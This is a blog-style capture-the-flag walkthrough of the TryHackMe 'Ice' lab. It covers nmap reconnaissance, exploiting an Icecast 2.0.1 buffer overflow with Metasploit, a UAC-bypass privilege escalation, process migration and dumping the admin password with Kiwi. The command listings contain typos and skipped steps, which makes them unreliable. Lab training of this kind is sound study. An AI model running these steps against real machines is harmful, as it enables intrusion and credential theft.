TryHackMe Walkthrough : Ice

Today we will be looking at ice from TryHackMe. Ice is a public room anyone can exploit the machine. This is easy machine but there is an interesting vulnerability “Icecast”. It can attract everyone’s attention.

Summary :

  • There are 7 tasks need to solve. Connect, Recon, Gain Acess, Escalate, Looting, Post-Exploitation, Extra Credit!
  • There is an open port on machine 8000/tcp Icecast.
  • There are two important open ports on machine 139 and 445.
  • Scan vuln : CVE-2007–6750 streaming media server.
  • Scan vuln: CVE-2017–0143 Risk factor : High.
  • There is an important vulnerable Icecast 2.0.1 streaming media server inside system.
  • There is an important vulnerable eternal blue inside system.
  • There are no flags anywhere.

Let’s start with this machine.

Task 1 : Connect

Connect to the TryHackme vpn server and deploy the box.

They told what to do.

Keep following this part.

Task 2 : Recon

I’m going to answer the questions asked to me one by one.

The “ice” machine IP is 10.10.62.158

We are going to apply the usual methodology of penetration testing as we have applied before. Let’s start with enumeration learn as much about the machine as possible.

Enumaration

We are going to start with the nmap scan to gather more information about the services and version running on this machine.

nmap -T4 -A -p- <targetip>

As we can see port 8000/tcp icecast streaming media server. If you ask what it means, Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.

#4 ans : We can see what the open 8000/tcp port is. Icecast

#5 ans : We can see that the hostname is DARK-PC.

nmap -sS <targetip>

#3 ans: 3389/tcp ms-wbt-server.

nmap -T4 -A -p- --script 10.10.62.158 -vv

Task 3 : Gain Acess

We going to cvedetails.com and find vulnerability details.

We have go to research this vulnerable.

#1, #2 ans:

https://www.cvedetails.com/cve/CVE-2004-1561/

We found it, there is an important vulnerability and exploit Icecast 2.0.1.

We can see CVE-2004–1561 and execute code overflow.

While doing this, we get help from the search in metasploit.

#4 ans:

msfconsole

We can learn do search which exploit to use by searching.

#5 ans : We can see “rhosts”.

Task 4 : Escalate

nmap rhosts <target ip>
exloit
getsystem
systeminfo
background or ctrl + z

#1, #2, #3, #4 : We can see all system information with the sysinfo command.

It is requested to use the post/multi/recon/local_exploit_suggester.

use post/multi/recon/local_exploit_suggester
option
set lhost tun0

It is requested to use the exploit/windows/local/bypassuac_evetvwr.

exploit
getprivs

#4 We can see owership file. SeTakeOwnershipPrivilege.

Task 5 : Looting

migrate -N spoolsv.exe
getuid
help

#1, #2, # 3 , #4, # 5, #6 ans :

#7, #8 ans :

Kiwi help.

We got the admin password.

Task 6 : Post-Exploitation

I don’t need to explain these.

Task 7 : Extra Credit!

Exploit link : https://www.exploit-db.com/exploits/568

Bonus :

I took a screenshot for you from the computer I accessed.

Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!

Interested in Cyber Security Engineering